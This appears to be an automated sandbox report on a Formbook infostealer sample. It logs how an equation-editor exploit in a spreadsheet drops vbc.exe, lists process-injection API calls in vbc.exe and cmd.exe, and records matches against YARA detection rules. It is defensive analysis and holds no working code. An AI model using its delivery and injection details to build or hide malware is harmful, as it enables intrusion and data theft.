          Source: 00000007.00000002.2278791944.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2278791944.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2391163751.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2391163751.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2391208418.00000000001D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2391208418.00000000001D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exeJump to dropped file
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00419D60 NtCreateFile,7_2_00419D60
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00419E10 NtReadFile,7_2_00419E10
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00419E90 NtClose,7_2_00419E90
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00419F40 NtAllocateVirtualMemory,7_2_00419F40
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00419E0A NtReadFile,7_2_00419E0A
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00419E8F NtClose,7_2_00419E8F
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A300C4 NtCreateFile,LdrInitializeThunk,7_2_00A300C4
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A30078 NtResumeThread,LdrInitializeThunk,7_2_00A30078
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A30048 NtProtectVirtualMemory,LdrInitializeThunk,7_2_00A30048
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2F9F0 NtClose,LdrInitializeThunk,7_2_00A2F9F0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2F900 NtReadFile,LdrInitializeThunk,7_2_00A2F900
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FAE8 NtQueryInformationProcess,LdrInitializeThunk,7_2_00A2FAE8
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_00A2FAD0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FBB8 NtQueryInformationToken,LdrInitializeThunk,7_2_00A2FBB8
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FB68 NtFreeVirtualMemory,LdrInitializeThunk,7_2_00A2FB68
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FC90 NtUnmapViewOfSection,LdrInitializeThunk,7_2_00A2FC90
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FC60 NtMapViewOfSection,LdrInitializeThunk,7_2_00A2FC60
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FD8C NtDelayExecution,LdrInitializeThunk,7_2_00A2FD8C
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FDC0 NtQuerySystemInformation,LdrInitializeThunk,7_2_00A2FDC0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FEA0 NtReadVirtualMemory,LdrInitializeThunk,7_2_00A2FEA0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_00A2FED0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FFB4 NtCreateSection,LdrInitializeThunk,7_2_00A2FFB4
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A30060 NtQuerySection,7_2_00A30060
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A301D4 NtSetValueKey,7_2_00A301D4
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3010C NtOpenDirectoryObject,7_2_00A3010C
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A307AC NtCreateMutant,7_2_00A307AC
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A30C40 NtGetContextThread,7_2_00A30C40
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A310D0 NtOpenProcessToken,7_2_00A310D0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A31148 NtOpenThread,7_2_00A31148
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2F8CC NtWaitForSingleObject,7_2_00A2F8CC
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A31930 NtSetContextThread,7_2_00A31930
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2F938 NtWriteFile,7_2_00A2F938
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FAB8 NtQueryValueKey,7_2_00A2FAB8
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FA20 NtQueryInformationFile,7_2_00A2FA20
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FA50 NtEnumerateValueKey,7_2_00A2FA50
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FBE8 NtQueryVirtualMemory,7_2_00A2FBE8
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FB50 NtCreateKey,7_2_00A2FB50
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FC30 NtOpenProcess,7_2_00A2FC30
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FC48 NtSetInformationFile,7_2_00A2FC48
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A31D80 NtSuspendThread,7_2_00A31D80
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FD5C NtEnumerateKey,7_2_00A2FD5C
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FE24 NtWriteVirtualMemory,7_2_00A2FE24
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FFFC NtCreateProcessEx,7_2_00A2FFFC
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A2FF34 NtQueueApcThread,7_2_00A2FF34
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A571E5F SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,9_2_4A571E5F
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A56F6CF NtSetInformationProcess,GetFileAttributesW,_get_osfhandle,SetEndOfFile,9_2_4A56F6CF
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A55C2A6 NtQueryInformationToken,GetCPInfo,NtQueryInformationToken,GetCPInfo,NtQueryInformationToken,9_2_4A55C2A6
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A55C48A GetCPInfo,NtOpenThreadToken,NtOpenProcessToken,GetCPInfo,NtClose,9_2_4A55C48A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A5618A6 _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,NtSetInformationProcess,9_2_4A5618A6
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A55C52D NtQueryInformationToken,9_2_4A55C52D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022900C4 NtCreateFile,LdrInitializeThunk,9_2_022900C4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022907AC NtCreateMutant,LdrInitializeThunk,9_2_022907AC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FAE8 NtQueryInformationProcess,LdrInitializeThunk,9_2_0228FAE8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FB68 NtFreeVirtualMemory,LdrInitializeThunk,9_2_0228FB68
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FB50 NtCreateKey,LdrInitializeThunk,9_2_0228FB50
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FBB8 NtQueryInformationToken,LdrInitializeThunk,9_2_0228FBB8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228F900 NtReadFile,LdrInitializeThunk,9_2_0228F900
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228F9F0 NtClose,LdrInitializeThunk,9_2_0228F9F0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,9_2_0228FED0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FFB4 NtCreateSection,LdrInitializeThunk,9_2_0228FFB4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FC60 NtMapViewOfSection,LdrInitializeThunk,9_2_0228FC60
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FD8C NtDelayExecution,LdrInitializeThunk,9_2_0228FD8C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FDC0 NtQuerySystemInformation,LdrInitializeThunk,9_2_0228FDC0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_02290060 NtQuerySection,9_2_02290060
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_02290078 NtResumeThread,9_2_02290078
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_02290048 NtProtectVirtualMemory,9_2_02290048
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0229010C NtOpenDirectoryObject,9_2_0229010C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022901D4 NtSetValueKey,9_2_022901D4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_02290C40 NtGetContextThread,9_2_02290C40
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022910D0 NtOpenProcessToken,9_2_022910D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_02291148 NtOpenThread,9_2_02291148
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FA20 NtQueryInformationFile,9_2_0228FA20
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FA50 NtEnumerateValueKey,9_2_0228FA50
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FAB8 NtQueryValueKey,9_2_0228FAB8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FAD0 NtAllocateVirtualMemory,9_2_0228FAD0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FBE8 NtQueryVirtualMemory,9_2_0228FBE8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228F8CC NtWaitForSingleObject,9_2_0228F8CC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228F938 NtWriteFile,9_2_0228F938
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_02291930 NtSetContextThread,9_2_02291930
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FE24 NtWriteVirtualMemory,9_2_0228FE24
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FEA0 NtReadVirtualMemory,9_2_0228FEA0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FF34 NtQueueApcThread,9_2_0228FF34
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FFFC NtCreateProcessEx,9_2_0228FFFC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FC30 NtOpenProcess,9_2_0228FC30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FC48 NtSetInformationFile,9_2_0228FC48
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FC90 NtUnmapViewOfSection,9_2_0228FC90
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0228FD5C NtEnumerateKey,9_2_0228FD5C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_02291D80 NtSuspendThread,9_2_02291D80
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00099D60 NtCreateFile,9_2_00099D60
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00099E10 NtReadFile,9_2_00099E10
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00099E90 NtClose,9_2_00099E90
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00099E0A NtReadFile,9_2_00099E0A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00099E8F NtClose,9_2_00099E8F
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A55A902: CreateFileW,DeviceIoControl,memcpy,CloseHandle,FindFirstStreamW,FindNextStreamW,FindClose,9_2_4A55A902
          Source: C:\Users\Public\vbc.exeCode function: 4_2_000352474_2_00035247
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00035A634_2_00035A63
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00381E004_2_00381E00
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0038A1184_2_0038A118
          Source: C:\Users\Public\vbc.exeCode function: 4_2_003872B24_2_003872B2
          Source: C:\Users\Public\vbc.exeCode function: 4_2_003872C04_2_003872C0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00381B884_2_00381B88
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00381B824_2_00381B82
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00385D704_2_00385D70
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00385D604_2_00385D60
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00381DF44_2_00381DF4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_000352475_2_00035247
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00035A635_2_00035A63
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041E87B7_2_0041E87B
          Source: C:\Users\Public\vbc.exeCode function: 7_2_004010307_2_00401030
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00402D887_2_00402D88
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00402D907_2_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00409E407_2_00409E40
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00409E3B7_2_00409E3B
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041DFAF7_2_0041DFAF
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00402FB07_2_00402FB0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3E0C67_2_00A3E0C6
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3E2E97_2_00A3E2E9
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AE63BF7_2_00AE63BF
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A663DB7_2_00A663DB
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A423057_2_00A42305
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A8A37B7_2_00A8A37B
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AC443E7_2_00AC443E
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AC05E37_2_00AC05E3
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A5C5F07_2_00A5C5F0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A865407_2_00A86540
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A446807_2_00A44680
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A4E6C17_2_00A4E6C1
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AE26227_2_00AE2622
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A8A6347_2_00A8A634
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A4C7BC7_2_00A4C7BC
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A6286D7_2_00A6286D
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A4C85C7_2_00A4C85C
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A429B27_2_00A429B2
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AE098E7_2_00AE098E
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AD49F57_2_00AD49F5
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A569FE7_2_00A569FE
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A8C9207_2_00A8C920
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AECBA47_2_00AECBA4
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AC6BCB7_2_00AC6BCB
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AE2C9C7_2_00AE2C9C
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00ACAC5E7_2_00ACAC5E
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A70D3B7_2_00A70D3B
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A4CD5B7_2_00A4CD5B
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A72E2F7_2_00A72E2F
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A5EE4C7_2_00A5EE4C
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00ADCFB17_2_00ADCFB1
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AB2FDC7_2_00AB2FDC
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A50F3F7_2_00A50F3F
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A6D0057_2_00A6D005
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00ABD06D7_2_00ABD06D
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A430407_2_00A43040
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A5905A7_2_00A5905A
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00ACD13F7_2_00ACD13F
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AE12387_2_00AE1238
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3F3CF7_2_00A3F3CF
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A473537_2_00A47353
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A754857_2_00A75485
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A514897_2_00A51489
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A7D47D7_2_00A7D47D
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AE35DA7_2_00AE35DA
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A4351F7_2_00A4351F
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AC579A7_2_00AC579A
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A757C37_2_00A757C3
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AD771D7_2_00AD771D
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00ADF8EE7_2_00ADF8EE
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00ABF8C47_2_00ABF8C4
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AC394B7_2_00AC394B
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AC59557_2_00AC5955
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00AF3A837_2_00AF3A83
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A3FBD77_2_00A3FBD7
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00ACDBDA7_2_00ACDBDA
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A67B007_2_00A67B00
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00ADFDDD7_2_00ADFDDD
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00ACBF147_2_00ACBF14
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A6DF7C7_2_00A6DF7C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A55B2109_2_4A55B210
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A5612D29_2_4A5612D2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A55276A9_2_4A55276A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A55E46C9_2_4A55E46C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A5639B69_2_4A5639B6
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0229E2E99_2_0229E2E9
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022A23059_2_022A2305
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022EA37B9_2_022EA37B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_023463BF9_2_023463BF
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022C63DB9_2_022C63DB
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0229E0C69_2_0229E0C6
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_023426229_2_02342622
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022EA6349_2_022EA634
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022A46809_2_022A4680
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022AE6C19_2_022AE6C1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022AC7BC9_2_022AC7BC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0232443E9_2_0232443E
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022E65409_2_022E6540
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_023205E39_2_023205E3
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022BC5F09_2_022BC5F0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0234CBA49_2_0234CBA4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_02326BCB9_2_02326BCB
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022C286D9_2_022C286D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022AC85C9_2_022AC85C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022EC9209_2_022EC920
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022A29B29_2_022A29B2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0234098E9_2_0234098E
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_023349F59_2_023349F5
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022B69FE9_2_022B69FE
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022D2E2F9_2_022D2E2F
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022BEE4C9_2_022BEE4C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022B0F3F9_2_022B0F3F
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0233CFB19_2_0233CFB1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_02312FDC9_2_02312FDC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0232AC5E9_2_0232AC5E
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_02342C9C9_2_02342C9C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022D0D3B9_2_022D0D3B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022ACD5B9_2_022ACD5B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_023412389_2_02341238
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022A73539_2_022A7353
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0229F3CF9_2_0229F3CF
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022CD0059_2_022CD005
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0231D06D9_2_0231D06D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022A30409_2_022A3040
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022B905A9_2_022B905A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0232D13F9_2_0232D13F
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0233771D9_2_0233771D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0232579A9_2_0232579A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022D57C39_2_022D57C3
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022DD47D9_2_022DD47D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022B14899_2_022B1489
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022D54859_2_022D5485
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022A351F9_2_022A351F
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_023435DA9_2_023435DA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_02353A839_2_02353A83
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022C7B009_2_022C7B00
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0232DBDA9_2_0232DBDA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0229FBD79_2_0229FBD7
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0233F8EE9_2_0233F8EE
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0231F8C49_2_0231F8C4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_023259559_2_02325955
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0232394B9_2_0232394B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0232BF149_2_0232BF14
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022CDF7C9_2_022CDF7C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0233FDDD9_2_0233FDDD
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00082D889_2_00082D88
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00082D909_2_00082D90
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00089E3B9_2_00089E3B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00089E409_2_00089E40
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_0009DFAF9_2_0009DFAF
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00082FB09_2_00082FB0
          Source: Request for quotation.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Users\Public\vbc.exeCode function: String function: 00A8373B appears 253 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00A83F92 appears 132 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00A3E2A8 appears 60 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00AAF970 appears 84 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00A3DF5C appears 137 times
          Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 0229DF5C appears 137 times
          Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 022E3F92 appears 132 times
          Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 022E373B appears 253 times
          Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 0229E2A8 appears 60 times
          Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 0230F970 appears 84 times
          Source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
